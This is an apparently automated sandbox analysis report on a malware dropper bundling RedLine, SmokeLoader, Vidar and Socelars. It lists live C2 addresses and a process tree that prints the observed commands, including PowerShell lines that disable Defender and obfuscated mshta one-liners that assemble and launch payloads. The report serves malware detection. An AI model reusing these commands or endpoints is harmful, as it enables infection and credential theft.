Overview

overview

10

Static

static

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows11_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

Resubmissions

02-11-2021 06:54

211102-hpn1zsbhc2 10

02-11-2021 06:42

211102-hgpmjsgggp 10

01-11-2021 21:47

211101-1ncknsfgfm 10

Analysis

  • max time kernel
    24417s
  • max time network
    28545s
  • platform
    windows7_x64
  • resource
    win7-ja-20210920
  • submitted
    01-11-2021 21:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.2MB

  • MD5

    b5b5fe52ed9ca7d47bfb857498fd684c

  • SHA1

    9c17089a630141c9b4e13ef46ab334d46709fdb8

  • SHA256

    6cbb4380d880c6bab221c81122b32e225ebf224942191fb08df5df82f971864b

  • SHA512

    482de7cacf73eb37050e323312b05d3d5d2152048efa5defa4b3d8687f6b3355233d8bf3f04d6107a7214f4b21e4f81f83313ecaf3bdcda98c7d95d60a41e79a

Score
10/10
redlinesmokeloadersocelarsvidar933media0121aspackv2backdoordiscoveryevasioninfostealerpersistencespywarestealersuricatatrojan

Malware Config

Extracted

Family

redline

Botnet

media0121

C2

91.121.67.60:23325

Extracted

Family

smokeloader

Version

2020

C2

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/
rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.6

Botnet

933

C2

https://mas.to/@lilocc

Attributes
  • profile_id

    933

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Vidar Stealer 2 IoCs
    stealer
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Blocklisted process makes network request 7 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 4 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Kills process with taskkill 8 IoCs
    evasion
  • Modifies system certificate store 2 TTPs 7 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 5 IoCs
  • Suspicious behavior: MapViewOfSection 40 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 19 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1080
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1548
      • C:\Users\Admin\AppData\Local\Temp\7zSC064C826\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSC064C826\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1416
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1832
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1124
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1848
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1816
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Mon17870faab0.exe
          4⤵
          • Loads dropped DLL
          PID:112
          • C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17870faab0.exe
            Mon17870faab0.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Modifies system certificate store
            • Suspicious use of AdjustPrivilegeToken
            PID:1996
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /c taskkill /f /im chrome.exe
              6⤵
                PID:2128
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im chrome.exe
                  7⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2208
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Mon175e6c8b40064b8c8.exe
            4⤵
            • Loads dropped DLL
            PID:1868
            • C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon175e6c8b40064b8c8.exe
              Mon175e6c8b40064b8c8.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:960
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\System32\mshta.exe" vBscRipT: ClOSe ( crEatEobJECt ( "wSCRIPT.SHEll" ). rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon175e6c8b40064b8c8.exe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon175e6c8b40064b8c8.exe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))
                6⤵
                  PID:2556
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon175e6c8b40064b8c8.exe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "" == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon175e6c8b40064b8c8.exe" ) do taskkill -Im "%~NxU" -f
                    7⤵
                      PID:2416
                      • C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe
                        6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt
                        8⤵
                        • Executes dropped EXE
                        PID:1244
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\System32\mshta.exe" vBscRipT: ClOSe ( crEatEobJECt ( "wSCRIPT.SHEll" ). rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))
                          9⤵
                            PID:2584
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" ) do taskkill -Im "%~NxU" -f
                              10⤵
                                PID:2592
                            • C:\Windows\SysWOW64\mshta.exe
                              "C:\Windows\System32\mshta.exe" vBsCrIpT: cLOse (CrEATEOBJECT ( "wScrIpT.ShelL" ). RUn ( "cMd /Q /R eCHO | SET /P = ""MZ"" > 1oZVDA.JaC & CoPy /y /b 1OZVDA.jAC + GjuW~.A +HPIuT6.AM + bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN " , 0 ,TRuE) )
                              9⤵
                                PID:3004
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /Q /R eCHO | SET /P = "MZ" > 1oZVDA.JaC &CoPy /y /b 1OZVDA.jAC + GjuW~.A +HPIuT6.AM + bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN
                                  10⤵
                                    PID:2400
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>1oZVDA.JaC"
                                      11⤵
                                        PID:2096
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                        11⤵
                                          PID:2784
                                        • C:\Windows\SysWOW64\regsvr32.exe
                                          regsvr32.exe /S YLIH.bIN
                                          11⤵
                                          • Executes dropped EXE
                                          PID:2948
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill -Im "Mon175e6c8b40064b8c8.exe" -f
                                    8⤵
                                    • Loads dropped DLL
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:908
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Mon178e7a516181.exe
                            4⤵
                            • Loads dropped DLL
                            PID:2012
                            • C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon178e7a516181.exe
                              Mon178e7a516181.exe
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:1088
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 804
                                6⤵
                                • Loads dropped DLL
                                • Program crash
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: GetForegroundWindowSpam
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2724
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Mon17bffc2992eb3d.exe /mixone
                            4⤵
                            • Loads dropped DLL
                            PID:1820
                            • C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17bffc2992eb3d.exe
                              Mon17bffc2992eb3d.exe /mixone
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:600
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /im "Mon17bffc2992eb3d.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17bffc2992eb3d.exe" & exit
                                6⤵
                                  PID:2936
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /im "Mon17bffc2992eb3d.exe" /f
                                    7⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2972
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c Mon173a360b525.exe
                              4⤵
                                PID:764
                                • C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon173a360b525.exe
                                  Mon173a360b525.exe
                                  5⤵
                                  • Executes dropped EXE
                                  PID:2592
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1159525110.exe"
                                    6⤵
                                      PID:3184
                                      • C:\Users\Admin\AppData\Local\Temp\1159525110.exe
                                        "C:\Users\Admin\AppData\Local\Temp\1159525110.exe"
                                        7⤵
                                          PID:3348
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\6570899418.exe"
                                        6⤵
                                          PID:4032
                                          • C:\Users\Admin\AppData\Local\Temp\6570899418.exe
                                            "C:\Users\Admin\AppData\Local\Temp\6570899418.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:4068
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "Mon173a360b525.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon173a360b525.exe" & exit
                                          6⤵
                                            PID:3772
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /im "Mon173a360b525.exe" /f
                                              7⤵
                                              • Kills process with taskkill
                                              PID:3992
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Mon17bbf11fdb575d.exe
                                        4⤵
                                        • Loads dropped DLL
                                        PID:1732
                                        • C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17bbf11fdb575d.exe
                                          Mon17bbf11fdb575d.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:760
                                          • C:\Users\Admin\AppData\Local\Temp\is-65H0Q.tmp\Mon17bbf11fdb575d.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\is-65H0Q.tmp\Mon17bbf11fdb575d.tmp" /SL5="$10172,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17bbf11fdb575d.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:2300
                                            • C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17bbf11fdb575d.exe
                                              "C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17bbf11fdb575d.exe" /SILENT
                                              7⤵
                                                PID:2388
                                                • C:\Users\Admin\AppData\Local\Temp\is-VGP8N.tmp\Mon17bbf11fdb575d.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-VGP8N.tmp\Mon17bbf11fdb575d.tmp" /SL5="$20186,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17bbf11fdb575d.exe" /SILENT
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Drops file in Program Files directory
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:2524
                                                  • C:\Users\Admin\AppData\Local\Temp\is-KNOUG.tmp\postback.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\is-KNOUG.tmp\postback.exe" ss1
                                                    9⤵
                                                    • Executes dropped EXE
                                                    PID:3000
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Mon179f74c0ff3cf1f.exe
                                          4⤵
                                            PID:908
                                            • C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon179f74c0ff3cf1f.exe
                                              Mon179f74c0ff3cf1f.exe
                                              5⤵
                                                PID:1928
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 1456
                                                  6⤵
                                                  • Program crash
                                                  PID:2692
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c Mon17afe24e0084db3.exe
                                              4⤵
                                              • Loads dropped DLL
                                              PID:1152
                                              • C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17afe24e0084db3.exe
                                                Mon17afe24e0084db3.exe
                                                5⤵
                                                • Executes dropped EXE
                                                PID:1824
                                                • C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17afe24e0084db3.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon17afe24e0084db3.exe" -u
                                                  6⤵
                                                  • Executes dropped EXE
                                                  PID:2812
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c Mon1727c156c4abcec.exe
                                              4⤵
                                                PID:1084
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c Mon174a6c5f1664f.exe
                                                4⤵
                                                  PID:1072
                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon174a6c5f1664f.exe
                                                    Mon174a6c5f1664f.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Suspicious use of SetThreadContext
                                                    PID:1792
                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon174a6c5f1664f.exe
                                                      C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon174a6c5f1664f.exe
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:2792
                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon174a6c5f1664f.exe
                                                      C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon174a6c5f1664f.exe
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      PID:2828
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c Mon178d8e5d06822.exe
                                                  4⤵
                                                  • Loads dropped DLL
                                                  PID:2016
                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC064C826\Mon178d8e5d06822.exe
                                                    Mon178d8e5d06822.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Modifies system certificate store
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:788
                                                    • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:2072
                                                      • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2624
                                                        • C:\Users\Admin\AppData\Roaming\193969.exe
                                                          "C:\Users\Admin\AppData\Roaming\193969.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:2748
                                                        • C:\Users\Admin\AppData\Roaming\6902674.exe
                                                          "C:\Users\Admin\AppData\Roaming\6902674.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Checks BIOS information in registry
                                                          • Checks whether UAC is enabled
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:2420
                                                        • C:\Users\Admin\AppData\Roaming\7979066.exe
                                                          "C:\Users\Admin\AppData\Roaming\7979066.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Checks BIOS information in registry
                                                          • Checks whether UAC is enabled
                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                          PID:1480
                                                        • C:\Users\Admin\AppData\Roaming\311589.exe
                                                          "C:\Users\Admin\AppData\Roaming\311589.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:2240
                                                          • C:\Windows\SysWOW64\mshta.exe
                                                            "C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\311589.exe"" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """" == """" for %T in ( ""C:\Users\Admin\AppData\Roaming\311589.exe"") do taskkill /im ""%~nxT"" /f " , 0 , tRue ) )
                                                            9⤵
                                                            • Executes dropped EXE
                                                            PID:2816
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\311589.exe" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "" == "" for %T in ( "C:\Users\Admin\AppData\Roaming\311589.exe") do taskkill /im "%~nxT" /f
                                                              10⤵
                                                                PID:2892
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /im "311589.exe" /f
                                                                  11⤵
                                                                  • Kills process with taskkill
                                                                  PID:1108
                                                          • C:\Users\Admin\AppData\Roaming\5202903.exe
                                                            "C:\Users\Admin\AppData\Roaming\5202903.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Suspicious behavior: SetClipboardViewer
                                                            PID:1876
                                                          • C:\Users\Admin\AppData\Roaming\103796.exe
                                                            "C:\Users\Admin\AppData\Roaming\103796.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:3032
                                                        • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                          7⤵
                                                            PID:2816
                                                          • C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:292
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 292 -s 1412
                                                              8⤵
                                                              • Program crash
                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                              PID:3116
                                                          • C:\Users\Admin\AppData\Local\Temp\chrome.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
                                                            7⤵
                                                              PID:2640
                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                8⤵
                                                                • Executes dropped EXE
                                                                PID:2980
                                                            • C:\Users\Admin\AppData\Local\Temp\chrome2.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:2480
                                                            • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                              PID:2232
                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                8⤵
                                                                  PID:2504
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                                                                    9⤵
                                                                    • Blocklisted process makes network request
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    PID:1928
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill -f -iM "search_hyperfs_206.exe"
                                                                      10⤵
                                                                      • Kills process with taskkill
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:692
                                                                    • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                      ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                      10⤵
                                                                      • Executes dropped EXE
                                                                      PID:2332
                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                        11⤵
                                                                          PID:2468
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                            12⤵
                                                                              PID:2872
                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                            "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                            11⤵
                                                                              PID:2096
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                12⤵
                                                                                  PID:556
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                    13⤵
                                                                                      PID:3092
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                      13⤵
                                                                                        PID:3084
                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                        msiexec -Y ..\lXQ2g.WC
                                                                                        13⤵
                                                                                          PID:3148
                                                                            • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:1196
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
                                                                                8⤵
                                                                                • Loads dropped DLL
                                                                                PID:1072
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /im "setup.exe" /f
                                                                                  9⤵
                                                                                  • Kills process with taskkill
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2660
                                                                            • C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe
